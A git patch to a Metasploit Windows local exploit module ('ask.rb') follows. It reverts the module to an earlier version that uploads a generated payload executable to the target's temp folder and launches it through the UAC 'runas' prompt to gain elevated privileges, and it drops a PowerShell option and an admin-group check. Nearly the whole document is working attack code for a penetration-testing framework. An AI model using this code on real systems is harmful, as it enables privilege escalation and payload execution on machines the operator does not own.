From 0cf1b7fece8905fdc7833f13519a1efd3f4ac8f6 Mon Sep 17 00:00:00 2001 From: b00stfr3ak Date: Mon, 9 Dec 2013 14:35:31 -0700 Subject: [PATCH] add original ask.rb --- modules/exploits/windows/local/ask.rb | 102 ++++++++++---------------- 1 file changed, 37 insertions(+), 65 deletions(-) diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index e978384d52..35796ed0a0 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -5,14 +5,12 @@ require 'msf/core' require 'msf/core/exploit/exe' -require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE include Post::File - include Exploit::Powershell def initialize(info={}) super( update_info( info, @@ -23,10 +21,7 @@ class Metasploit3 < Msf::Exploit::Local UAC settings. }, 'License' => MSF_LICENSE, - 'Author' => [ - 'mubix', # Original technique - 'b00stfr3ak' # Added powershell option - ], + 'Author' => [ 'mubix' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], @@ -34,48 +29,19 @@ class Metasploit3 < Msf::Exploit::Local 'References' => [ [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ] ], - 'DisclosureDate'=> "Jan 3 2012", + 'DisclosureDate'=> "Jan 3 2012" )) register_options([ OptString.new("FILENAME", [ false, "File name on disk"]), OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]), - OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]), - OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]), + OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]) ]) end - def check - session.readline - print_status('Checking admin status...') - whoami = session.sys.process.execute('cmd /c whoami /groups', - nil, - {'Hidden' => true, 'Channelized' => true} - ) - cmdout = [] - while(cmdoutput = whoami.channel.read) - cmdout << cmdoutput - end - if cmdout.size == 0 - fail_with(Exploit::Failure::None, "Either whoami is not there or failed to execute") - else - isinadmins = cmdout.join.scan(/S-1-5-32-544/) - if isinadmins.size > 0 - print_good('Part of Administrators group! Continuing...') - return Exploit::CheckCode::Vulnerable - else - print_error('Not in admins group, cannot escalate with this module') - print_error('Exiting...') - return Exploit::CheckCode::Safe - end - end - end def exploit - admin_check = check - if admin_check.join =~ /safe/ - return Exploit::CheckCode::Safe - end + root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") open_key = session.sys.registry.open_key(root_key, base_key) lua_setting = open_key.query_value('EnableLUA') @@ -89,38 +55,44 @@ class Metasploit3 < Msf::Exploit::Local uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') case uac_level.data - when 2 - print_status "UAC is set to 'Always Notify'" - print_status "The user will be prompted, wait for them to click 'Ok'" - when 5 - print_debug "UAC is set to Default" - print_debug "The user will be prompted, wait for them to click 'Ok'" - when 0 - print_good "UAC is not enabled, no prompt for the user" + when 2 + print_status "UAC is set to 'Always Notify'" + print_status "The user will be prompted, wait for them to click 'Ok'" + when 5 + print_debug "UAC is set to Default" + print_debug "The user will be prompted, wait for them to click 'Ok'" + when 0 + print_good "UAC is not enabled, no prompt for the user" end + # # Generate payload and random names for upload # - case datastore["TECHNIQUE"] - when "EXE" - exe_payload = generate_payload_exe - payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" - payload_path = datastore["PATH"] || expand_path("%TEMP%") - cmd_location = "#{payload_path}\\#{payload_filename}" - if datastore["UPLOAD"] - print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...") - write_file(cmd_location, exe_payload) - else - #print_error("No Upload Path!") - fail_with(Exploit::Failure::BadConfig, "No Upload Path!") - return - end - command, args = cmd_location,nil - session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5) - when "PSH" - command, args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}" + payload = generate_payload_exe + + if datastore["FILENAME"] + payload_filename = datastore["FILENAME"] + else + payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" end - session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5) + + if datastore["PATH"] + payload_path = datastore["PATH"] + else + payload_path = session.fs.file.expand_path("%TEMP%") + end + + cmd_location = "#{payload_path}\\#{payload_filename}" + + if datastore["UPLOAD"] + print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...") + fd = session.fs.file.new(cmd_location, "wb") + fd.write(payload) + fd.close + end + + session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5) + end end